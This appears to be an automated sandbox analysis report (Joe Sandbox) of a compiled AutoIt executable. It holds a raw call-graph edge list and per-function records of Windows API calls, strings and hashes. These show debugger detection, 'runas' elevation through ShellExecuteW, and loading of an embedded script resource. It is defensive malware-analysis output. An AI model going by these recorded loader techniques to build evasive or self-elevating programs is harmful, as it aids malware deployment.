98245->98196 98245->98197 98245->98199 98245->98201 98245->98204 98245->98222 98245->98225 98245->98229 98245->98230 98245->98232 98245->98234 98245->98235 98245->98237 98245->98238 98245->98239 98245->98240 98245->98241 98245->98242 98245->98243 98245->98244 99633 40e580 98245->99633 99640 40e800 98245->99640 99671 40f5c0 98245->99671 99690 40fe40 341 API calls 
98245->99690 99691 4031ce IsDialogMessageW GetClassLongW 98245->99691 99698 48629f 59 API calls 98245->99698 99699 469c9f 59 API calls 98245->99699 99700 45d9e3 59 API calls 98245->99700 99701 409997 98245->99701 99719 456665 59 API calls 98245->99719 99720 408561 59 API calls 98245->99720 99721 40843f 59 API calls 98245->99721 98247->97983 98248->97995 98250 431b90 98249->98250 98251 404871 GetModuleFileNameW 98250->98251 98252 407f41 59 API calls 98251->98252 98253 404897 98252->98253 98254 4048ae 60 API calls 98253->98254 98255 4048a1 98254->98255 98255->98002 98279 420ffe 98276->98279 98278 421018 98278->98025 98279->98278 98281 42101c 98279->98281 98286 42594c 98279->98286 98303 4235e1 DecodePointer 98279->98303 98304 4287db RaiseException 98281->98304 98283 421046 98305 428711 58 API calls 98283->98305 98285 421058 98285->98025 98287 4259c7 98286->98287 98297 425958 98286->98297 98312 4235e1 DecodePointer 98287->98312 98289 4259cd 98313 428d68 58 API calls 98289->98313 98292 42598b RtlAllocateHeap 98293 4259bf 98292->98293 98292->98297 98293->98279 98295 425963 98295->98297 98306 42a3ab 58 API calls 98295->98306 98307 42a408 58 API calls 98295->98307 98308 4232df GetModuleHandleExW GetProcAddress ExitProcess 98295->98308 98296 4259b3 98310 428d68 58 API calls 98296->98310 98297->98292 98297->98295 98297->98296 98301 4259b1 98297->98301 98309 4235e1 DecodePointer 98297->98309 98311 428d68 58 API calls 98301->98311 98303->98279 98304->98283 98305->98285 98306->98295 98307->98295 98309->98297 98310->98301 98311->98293 98312->98289 98313->98293 98315 403d50 98314->98315 98316 407d2c 59 API calls 98315->98316 98320 403eb6 98315->98320 98318 403d82 98316->98318 98326 403db8 98318->98326 98440 407b52 98318->98440 98319 403e89 98319->98320 98321 407f41 59 API calls 98319->98321 98320->98032 98323 403eaa 98321->98323 98322 407f41 59 API calls 98322->98326 98325 403f84 59 API calls 98323->98325 98324 407b52 59 API calls 98324->98326 98325->98320 98326->98319 
98326->98320 98326->98322 98326->98324 98443 403f84 98326->98443 98453 404d13 98328->98453 98333 404f68 LoadLibraryExW 98463 404cc8 98333->98463 98334 43dd0f 98335 404faa 84 API calls 98334->98335 98337 43dd16 98335->98337 98340 404cc8 3 API calls 98337->98340 98342 43dd1e 98340->98342 98341 404f8f 98341->98342 98343 404f9b 98341->98343 98489 40506b 98342->98489 98344 404faa 84 API calls 98343->98344 98346 4037e6 98344->98346 98346->98039 98346->98040 98349 43dd45 98497 405027 98349->98497 98351 43dd52 98353 4081b2 98352->98353 98354 403801 98352->98354 98927 4080d7 59 API calls 98353->98927 98356 4093ea 98354->98356 98357 420ff6 59 API calls 98356->98357 98358 40380d 98357->98358 98358->98053 98360 40862b 98359->98360 98362 408652 98360->98362 98928 408b13 69 API calls 98360->98928 98362->98057 98364 403f05 98363->98364 98365 403eec 98363->98365 98366 407d2c 59 API calls 98364->98366 98367 4081a7 59 API calls 98365->98367 98368 40388b 98366->98368 98367->98368 98369 42313d 98368->98369 98370 4231be 98369->98370 98371 423149 98369->98371 98931 4231d0 60 API calls 98370->98931 98378 42316e 98371->98378 98929 428d68 58 API calls 98371->98929 98374 4231cb 98374->98078 98375 423155 98930 428ff6 9 API calls 98375->98930 98377 423160 98377->98078 98378->98078 98380 409436 98379->98380 98381 420ff6 59 API calls 98380->98381 98382 409444 98381->98382 98383 403936 98382->98383 98932 40935c 59 API calls 98382->98932 98385 4091b0 98383->98385 98933 4092c0 98385->98933 98387 4091bf 98388 420ff6 59 API calls 98387->98388 98389 403944 98387->98389 98388->98389 98390 409040 98389->98390 98391 43f5a5 98390->98391 98396 409057 98390->98396 98391->98396 98943 408d3b 59 API calls 98391->98943 98393 4091a0 98942 409e9c 60 API calls 98393->98942 98394 409158 98397 420ff6 59 API calls 98394->98397 98396->98393 98396->98394 98398 40915f 98396->98398 98397->98398 98398->98106 98400 405045 85 API calls 98399->98400 98401 469854 98400->98401 98944 4699be 98401->98944 98404 40506b 74 API 
calls 98405 469881 98404->98405 98406 40506b 74 API calls 98405->98406 98407 469891 98406->98407 98408 40506b 74 API calls 98407->98408 98409 4698ac 98408->98409 98410 40506b 74 API calls 98409->98410 98411 4698c7 98410->98411 98412 405045 85 API calls 98411->98412 98413 4698de 98412->98413 98414 42594c 58 API calls 98413->98414 98415 4698e5 98414->98415 98416 42594c 58 API calls 98415->98416 98417 4698ef 98416->98417 98418 40506b 74 API calls 98417->98418 98419 469903 98418->98419 98420 469393 GetSystemTimeAsFileTime 98419->98420 98421 469916 98420->98421 98422 469940 98421->98422 98423 46992b 98421->98423 98425 469946 98422->98425 98426 4699a5 98422->98426 98424 422f95 58 API calls 98423->98424 98429 469931 98424->98429 98950 468d90 98425->98950 98428 422f95 58 API calls 98426->98428 98431 43d3c1 98428->98431 98432 422f95 58 API calls 98429->98432 98431->98043 98434 404faa 98431->98434 98432->98431 98433 422f95 58 API calls 98433->98431 98435 404fb4 98434->98435 98436 404fbb 98434->98436 98437 4255d6 83 API calls 98435->98437 98438 404fca 98436->98438 98439 404fdb FreeLibrary 98436->98439 98437->98436 98438->98043 98439->98438 98449 407faf 98440->98449 98442 407b5d 98442->98318 98444 403f92 98443->98444 98448 403fb4 98443->98448 98446 420ff6 59 API calls 98444->98446 98445 420ff6 59 API calls 98447 403fc8 98445->98447 98446->98448 98447->98326 98448->98445 98450 407fc2 98449->98450 98452 407fbf 98449->98452 98451 420ff6 59 API calls 98450->98451 98451->98452 98452->98442 98502 404d61 98453->98502 98456 404d53 98460 42548b 98456->98460 98457 404d4a FreeLibrary 98457->98456 98458 404d61 2 API calls 98459 404d3a 98458->98459 98459->98456 98459->98457 98506 4254a0 98460->98506 98462 404f5c 98462->98333 98462->98334 98664 404d94 98463->98664 98466 404ced 98468 404d08 98466->98468 98469 404cff FreeLibrary 98466->98469 98467 404d94 2 API calls 98467->98466 98470 404dd0 98468->98470 98469->98468 98471 420ff6 59 API calls 98470->98471 98472 404de5 98471->98472 98668 
40538e 98472->98668 98474 404df1 98475 404e2c 98474->98475 98476 404f21 98474->98476 98477 404ee9 98474->98477 98478 405027 69 API calls 98475->98478 98682 469ba5 95 API calls 98476->98682 98671 404fe9 CreateStreamOnHGlobal 98477->98671 98484 404e35 98478->98484 98481 40506b 74 API calls 98481->98484 98482 404ec9 98482->98341 98484->98481 98484->98482 98485 43dcd0 98484->98485 98677 405045 98484->98677 98486 405045 85 API calls 98485->98486 98487 43dce4 98486->98487 98488 40506b 74 API calls 98487->98488 98488->98482 98490 40507d 98489->98490 98493 43ddf6 98489->98493 98706 425812 98490->98706 98494 469393 98904 4691e9 98494->98904 98496 4693a9 98496->98349 98498 405036 98497->98498 98499 43ddb9 98497->98499 98909 425e90 98498->98909 98501 40503e 98501->98351 98503 404d2e 98502->98503 98504 404d6a LoadLibraryA 98502->98504 98503->98458 98503->98459 98504->98503 98505 404d7b GetProcAddress 98504->98505 98505->98503 98509 4254ac 98506->98509 98507 4254bf 98555 428d68 58 API calls 98507->98555 98509->98507 98511 4254f0 98509->98511 98510 4254c4 98556 428ff6 9 API calls 98510->98556 98525 430738 98511->98525 98514 4254f5 98515 42550b 98514->98515 98516 4254fe 98514->98516 98518 425535 98515->98518 98519 425515 98515->98519 98557 428d68 58 API calls 98516->98557 98540 430857 98518->98540 98558 428d68 58 API calls 98519->98558 98520 4254cf 98520->98462 98526 430744 98525->98526 98527 429e4b 58 API calls 98526->98527 98538 430752 98527->98538 98528 4307c6 98560 43084e 98528->98560 98529 4307cd 98565 428a5d 58 API calls 98529->98565 98532 4307d4 98532->98528 98566 42a06b InitializeCriticalSectionAndSpinCount 98532->98566 98533 430843 98533->98514 98535 429ed3 58 API calls 98535->98538 98537 4307fa EnterCriticalSection 98537->98528 98538->98528 98538->98529 98538->98535 98563 426e8d 59 API calls 98538->98563 98564 426ef7 LeaveCriticalSection LeaveCriticalSection 98538->98564 98541 430877 98540->98541 98542 430891 98541->98542 98551 430a4c 98541->98551 98573 423a0b 60 API 
calls 98541->98573 98571 428d68 58 API calls 98542->98571 98544 430896 98572 428ff6 9 API calls 98544->98572 98546 425540 98559 425562 LeaveCriticalSection LeaveCriticalSection 98546->98559 98547 430aaf 98568 4387f1 98547->98568 98550 430a45 98550->98551 98574 423a0b 60 API calls 98550->98574 98551->98542 98551->98547 98553 430a64 98553->98551 98575 423a0b 60 API calls 98553->98575 98555->98510 98556->98520 98557->98520 98558->98520 98559->98520 98567 429fb5 LeaveCriticalSection 98560->98567 98562 430855 98562->98533 98563->98538 98564->98538 98565->98532 98566->98537 98567->98562 98576 437fd5 98568->98576 98570 43880a 98570->98546 98571->98544 98572->98546 98573->98550 98574->98553 98575->98551 98577 437fe1 98576->98577 98578 437ff7 98577->98578 98581 43802d 98577->98581 98661 428d68 58 API calls 98578->98661 98580 437ffc 98662 428ff6 9 API calls 98580->98662 98587 43809e 98581->98587 98584 438049 98663 438072 LeaveCriticalSection 98584->98663 98586 438006 98586->98570 98588 4380be 98587->98588 98589 42471a 58 API calls 98588->98589 98592 4380da 98589->98592 98590 429006 8 API calls 98591 4387f0 98590->98591 98593 437fd5 103 API calls 98591->98593 98594 438114 98592->98594 98598 438137 98592->98598 98610 438211 98592->98610 98596 43880a 98593->98596 98595 428d34 58 API calls 98594->98595 98597 438119 98595->98597 98596->98584 98599 428d68 58 API calls 98597->98599 98601 4381f5 98598->98601 98609 4381d3 98598->98609 98600 438126 98599->98600 98602 428ff6 9 API calls 98600->98602 98603 428d34 58 API calls 98601->98603 98604 438130 98602->98604 98605 4381fa 98603->98605 98604->98584 98606 428d68 58 API calls 98605->98606 98607 438207 98606->98607 98608 428ff6 9 API calls 98607->98608 98608->98610 98611 42d4d4 61 API calls 98609->98611 98610->98590 98612 4382a1 98611->98612 98613 4382ab 98612->98613 98614 4382ce 98612->98614 98616 428d34 58 API calls 98613->98616 98615 437f4d GetModuleHandleW GetProcAddress CreateFileW 98614->98615 98626 4382f0 98615->98626 98617 
4382b0 98616->98617 98618 428d68 58 API calls 98617->98618 98620 4382ba 98618->98620 98619 43836e GetFileType 98621 4383bb 98619->98621 98622 438379 GetLastError 98619->98622 98624 428d68 58 API calls 98620->98624 98631 42d76a 59 API calls 98621->98631 98625 428d47 58 API calls 98622->98625 98623 43833c GetLastError 98627 428d47 58 API calls 98623->98627 98624->98604 98629 4383a0 CloseHandle 98625->98629 98626->98619 98626->98623 98630 437f4d GetModuleHandleW GetProcAddress CreateFileW 98626->98630 98628 438361 98627->98628 98634 428d68 58 API calls 98628->98634 98629->98628 98632 4383ae 98629->98632 98633 438331 98630->98633 98638 4383d9 98631->98638 98635 428d68 58 API calls 98632->98635 98633->98619 98633->98623 98634->98610 98636 4383b3 98635->98636 98636->98628 98637 438594 98637->98610 98640 438767 CloseHandle 98637->98640 98638->98637 98639 431b11 60 API calls 98638->98639 98655 43845a 98638->98655 98641 438443 98639->98641 98642 437f4d GetModuleHandleW GetProcAddress CreateFileW 98640->98642 98644 428d34 58 API calls 98641->98644 98641->98655 98643 43878e 98642->98643 98646 438796 GetLastError 98643->98646 98647 4387c2 98643->98647 98644->98655 98645 4310ab 70 API calls 98645->98655 98648 428d47 58 API calls 98646->98648 98647->98610 98650 4387a2 98648->98650 98649 43848c 98652 4399f2 82 API calls 98649->98652 98649->98655 98653 42d67d 59 API calls 98650->98653 98651 430d2d 61 API calls 98651->98655 98652->98649 98653->98647 98654 42dac6 78 API calls 98654->98655 98655->98637 98655->98645 98655->98649 98655->98651 98655->98654 98656 438611 98655->98656 98657 431b11 60 API calls 98655->98657 98658 430d2d 61 API calls 98656->98658 98657->98655 98659 438618 98658->98659 98660 428d68 58 API calls 98659->98660 98660->98610 98661->98580 98662->98586 98663->98586 98665 404ce1 98664->98665 98666 404d9d LoadLibraryA 98664->98666 98665->98466 98665->98467 98666->98665 98667 404dae GetProcAddress 98666->98667 98667->98665 98669 420ff6 59 API calls 98668->98669 98670 
4053a0 98669->98670 98670->98474 98672 405003 FindResourceExW 98671->98672 98676 405020 98671->98676 98673 43dd5c LoadResource 98672->98673 98672->98676 98674 43dd71 SizeofResource 98673->98674 98673->98676 98675 43dd85 LockResource 98674->98675 98674->98676 98675->98676 98676->98475 98678 405054 98677->98678 98679 43ddd4 98677->98679 98683 425a7d 98678->98683 98681 405062 98681->98484 98682->98475 98684 425a89 98683->98684 98685 425a9b 98684->98685 98687 425ac1 98684->98687 98696 428d68 58 API calls 98685->98696 98698 426e4e 98687->98698 98689 425aa0 98697 428ff6 9 API calls 98689->98697 98690 425ac7 98704 4259ee 83 API calls 98690->98704 98693 425ad6 98705 425af8 LeaveCriticalSection LeaveCriticalSection 98693->98705 98694 425aab 98694->98681 98696->98689 98697->98694 98699 426e80 EnterCriticalSection 98698->98699 98700 426e5e 98698->98700 98701 426e76 98699->98701 98700->98699 98702 426e66 98700->98702 98701->98690 98703 429e4b 58 API calls 98702->98703 98703->98701 98704->98693 98705->98694 98709 42582d 98706->98709 98708 40508e 98708->98494 98710 425839 98709->98710 98711 42587c 98710->98711 98712 425874 98710->98712 98716 42584f 98710->98716 98713 426e4e 59 API calls 98711->98713 98712->98708 98715 425882 98713->98715 98722 42564d 98715->98722 98736 428d68 58 API calls 98716->98736 98717 425869 98737 428ff6 9 API calls 98717->98737 98724 425668 98722->98724 98728 425683 98722->98728 98723 425673 98834 428d68 58 API calls 98723->98834 98724->98723 98724->98728 98731 4256c3 98724->98731 98726 425678 98835 428ff6 9 API calls 98726->98835 98738 4258b6 LeaveCriticalSection LeaveCriticalSection 98728->98738 98730 4257d4 98837 428d68 58 API calls 98730->98837 98731->98728 98731->98730 98739 424916 98731->98739 98746 4310ab 98731->98746 98814 430df7 98731->98814 98836 430f18 58 API calls 98731->98836 98736->98717 98737->98712 98738->98712 98740 424920 98739->98740 98741 424935 98739->98741 98838 428d68 58 API calls 98740->98838 98741->98731 98743 424925 98839 428ff6 
9 API calls 98743->98839 98745 424930 98745->98731 98747 4310e3 98746->98747 98748 4310cc 98746->98748 98750 43181b 98747->98750 98754 43111d 98747->98754 98849 428d34 58 API calls 98748->98849 98865 428d34 58 API calls 98750->98865 98751 4310d1 98850 428d68 58 API calls 98751->98850 98756 431125 98754->98756 98763 43113c 98754->98763 98755 431820 98866 428d68 58 API calls 98755->98866 98851 428d34 58 API calls 98756->98851 98759 431131 98867 428ff6 9 API calls 98759->98867 98760 43112a 98852 428d68 58 API calls 98760->98852 98762 431151 98853 428d34 58 API calls 98762->98853 98763->98762 98765 43116b 98763->98765 98767 431189 98763->98767 98794 4310d8 98763->98794 98765->98762 98770 431176 98765->98770 98854 428a5d 58 API calls 98767->98854 98840 435ebb 98770->98840 98771 431199 98772 4311a1 98771->98772 98773 4311bc 98771->98773 98855 428d68 58 API calls 98772->98855 98857 431b11 60 API calls 98773->98857 98774 43128a 98776 431303 ReadFile 98774->98776 98781 4312a0 GetConsoleMode 98774->98781 98779 4317e3 GetLastError 98776->98779 98780 431325 98776->98780 98778 4311a6 98856 428d34 58 API calls 98778->98856 98783 4317f0 98779->98783 98784 4312e3 98779->98784 98780->98779 98788 4312f5 98780->98788 98785 431300 98781->98785 98786 4312b4 98781->98786 98863 428d68 58 API calls 98783->98863 98796 4312e9 98784->98796 98858 428d47 58 API calls 98784->98858 98785->98776 98786->98785 98789 4312ba ReadConsoleW 98786->98789 98788->98796 98797 43135a 98788->98797 98806 4315c7 98788->98806 98789->98788 98791 4312dd GetLastError 98789->98791 98790 4317f5 98864 428d34 58 API calls 98790->98864 98791->98784 98794->98731 98795 422f95 58 API calls 98795->98794 98796->98794 98796->98795 98798 4313c6 ReadFile 98797->98798 98804 431447 98797->98804 98800 4313e7 GetLastError 98798->98800 98813 4313f1 98798->98813 98800->98813 98801 431504 98808 4314b4 MultiByteToWideChar 98801->98808 98861 431b11 60 API calls 98801->98861 98802 4314f4 98860 428d68 58 API calls 98802->98860 98803 
4316cd ReadFile 98807 4316f0 GetLastError 98803->98807 98811 4316fe 98803->98811 98804->98796 98804->98801 98804->98802 98804->98808 98806->98796 98806->98803 98807->98811 98808->98791 98808->98796 98811->98806 98862 431b11 60 API calls 98811->98862 98813->98797 98859 431b11 60 API calls 98813->98859 98815 430e02 98814->98815 98819 430e17 98814->98819 98901 428d68 58 API calls 98815->98901 98817 430e12 98817->98731 98818 430e07 98902 428ff6 9 API calls 98818->98902 98819->98817 98821 430e4c 98819->98821 98903 436234 58 API calls 98819->98903 98823 424916 58 API calls 98821->98823 98824 430e60 98823->98824 98868 430f97 98824->98868 98826 430e67 98826->98817 98827 424916 58 API calls 98826->98827 98828 430e8a 98827->98828 98828->98817 98829 424916 58 API calls 98828->98829 98830 430e96 98829->98830 98830->98817 98831 424916 58 API calls 98830->98831 98832 430ea3 98831->98832 98833 424916 58 API calls 98832->98833 98833->98817 98834->98726 98835->98728 98836->98731 98837->98726 98838->98743 98839->98745 98841 435ed3 98840->98841 98842 435ec6 98840->98842 98844 435edf 98841->98844 98845 428d68 58 API calls 98841->98845 98843 428d68 58 API calls 98842->98843 98846 435ecb 98843->98846 98844->98774 98847 435f00 98845->98847 98846->98774 98848 428ff6 9 API calls 98847->98848 98848->98846 98849->98751 98850->98794 98851->98760 98852->98759 98853->98760 98854->98771 98855->98778 98856->98794 98857->98770 98858->98796 98859->98813 98860->98796 98861->98808 98862->98811 98863->98790 98864->98796 98865->98755 98866->98759 98867->98794 98869 430fa3 98868->98869 98870 430fb0 98869->98870 98871 430fc7 98869->98871 98872 428d34 58 API calls 98870->98872 98873 43108b 98871->98873 98876 430fdb 98871->98876 98875 430fb5 98872->98875 98874 428d34 58 API calls 98873->98874 98877 430ffe 98874->98877 98878 428d68 58 API calls 98875->98878 98879 431006 98876->98879 98880 430ff9 98876->98880 98887 428d68 58 API calls 98877->98887 98883 430fbc 98878->98883 98881 431013 98879->98881 98882 

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B7A
                                                              • IsDebuggerPresent.KERNEL32 ref: 00403B8C
                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,004C62F8,004C62E0,?,?), ref: 00403BFD
                                                                • Part of subcall function 00410A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C26,004C62F8,?,?,?), ref: 00410ACE
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00403C81
                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B93F0,00000010), ref: 0043D4BC
                                                              • SetCurrentDirectoryW.KERNEL32(?,004C62F8,?,?,?), ref: 0043D4F4
                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B5D40,004C62F8,?,?,?), ref: 0043D57A
                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D581
                                                                • Part of subcall function 00403A58: GetSysColorBrush.USER32(0000000F), ref: 00403A62
                                                                • Part of subcall function 00403A58: LoadCursorW.USER32(00000000,00007F00), ref: 00403A71
                                                                • Part of subcall function 00403A58: LoadIconW.USER32(00000063), ref: 00403A88
                                                                • Part of subcall function 00403A58: LoadIconW.USER32(000000A4), ref: 00403A9A
                                                                • Part of subcall function 00403A58: LoadIconW.USER32(000000A2), ref: 00403AAC
                                                                • Part of subcall function 00403A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AD2
                                                                • Part of subcall function 00403A58: RegisterClassExW.USER32(?), ref: 00403B28
                                                                • Part of subcall function 004039E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A15
                                                                • Part of subcall function 004039E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A36
                                                                • Part of subcall function 004039E7: ShowWindow.USER32(00000000,?,?), ref: 00403A4A
                                                                • Part of subcall function 004039E7: ShowWindow.USER32(00000000,?,?), ref: 00403A53
                                                                • Part of subcall function 004043DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004044A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_
                                                              • String ID: This is a third-party compiled AutoIt script.$runas$%I
                                                              • API String ID: 1385234928-2806069697
                                                              • Opcode ID: 1ef8420d7069191806342d94a18f46b7946fa95cf218c5e93081cfc8bbc94521
                                                              • Instruction ID: 0f2c37a458a75ddd4165d4490fb1e043a1c32b8e6bc4467291d23e22a2595f58
                                                              • Opcode Fuzzy Hash: 1ef8420d7069191806342d94a18f46b7946fa95cf218c5e93081cfc8bbc94521
                                                              • Instruction Fuzzy Hash: F351B575D08248AADB11AFB5DC05EEE7B78AB45304B1081BFF811B21E1DA7C5645CB2E

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6b95aab6f174b6631bd9fbfb9a50bbfcda543df44edc3c6637ec930a2cbdb34e
                                                              • Instruction ID: d62d24140ea0e0ec6d287f47ef26bb689d81bbfa3dc41fa89b9a1f9a2f24fac5
                                                              • Opcode Fuzzy Hash: 6b95aab6f174b6631bd9fbfb9a50bbfcda543df44edc3c6637ec930a2cbdb34e
                                                              • Instruction Fuzzy Hash: 5B327275B021388FCB24CF15ED85AEAB7B5FB46314F4441EAE40A97A81C7349E81CF5A

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00404EEE,?,?,00000000,00000000), ref: 00404FF9
                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404EEE,?,?,00000000,00000000), ref: 00405010
                                                              • LoadResource.KERNEL32(?,00000000,?,?,00404EEE,?,?,00000000,00000000,?,?,?,?,?,?,00404F8F), ref: 0043DD60
                                                              • SizeofResource.KERNEL32(?,00000000,?,?,00404EEE,?,?,00000000,00000000,?,?,?,?,?,?,00404F8F), ref: 0043DD75
                                                              • LockResource.KERNEL32(N@,?,?,00404EEE,?,?,00000000,00000000,?,?,?,?,?,?,00404F8F,00000000), ref: 0043DD88
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                              • String ID: SCRIPT$N@
                                                              • API String ID: 3051347437-2499734412
                                                              • Opcode ID: 5ec92892c76f8d1a0b25561ef3fd13e1900f32b078569a65020aaf11a3c9a4ea
                                                              • Instruction ID: 67856c902de3f53bc3f8eb18af461e19ea0094fb9f07ee8290f0089f1c16aac3
                                                              • Opcode Fuzzy Hash: 5ec92892c76f8d1a0b25561ef3fd13e1900f32b078569a65020aaf11a3c9a4ea
                                                              • Instruction Fuzzy Hash: 33115A75200700AFD7218B65EC58F6B7BB9EBC9B11F20457DF406D62A0DB72E8048A69

                                                              Control-flow Graph

                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 00404B2B
                                                              • GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404BF8
                                                              • IsWow64Process.KERNEL32(00000000), ref: 00404BFF
                                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00404C45
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00404C50
                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00404C81
                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00404C8D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64
                                                              • String ID:
                                                              • API String ID: 2813406015-0
                                                              • Opcode ID: cd30fc2adabaadb48236dc33c1ba51adc404ead27c5a3d83d7604e8d22645665
                                                              • Instruction ID: a2a37668ba8dc9db7c0339275d8cd71390b5c234514a477f546c7b3e3bed8d02
                                                              • Opcode Fuzzy Hash: cd30fc2adabaadb48236dc33c1ba51adc404ead27c5a3d83d7604e8d22645665
                                                              • Instruction Fuzzy Hash: D591C17194A7C0DAC731CB6894511ABBFE4AF6A300F44496FD1CAA3B41D238F908D72E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DtL$DtL$DtL$DtL$Variable must be of type 'Object'.
                                                              • API String ID: 0-814274700
                                                              • Opcode ID: dca0ef4c892b0d1592b2a78f9059ac52e4f12bb6aca03198f80d0126c7195138
                                                              • Instruction ID: 646285330f24ea673303868bc9691634490c9c151704f09186753778590e683b
                                                              • Opcode Fuzzy Hash: dca0ef4c892b0d1592b2a78f9059ac52e4f12bb6aca03198f80d0126c7195138
                                                              • Instruction Fuzzy Hash: 88A28C74A04205CFDB24CF59C480AAAB7B1FF48304F24847AE916BB391D739EC56CB99
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,0043E7C1), ref: 004646A6
                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 004646B7
                                                              • FindClose.KERNEL32(00000000), ref: 004646C7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
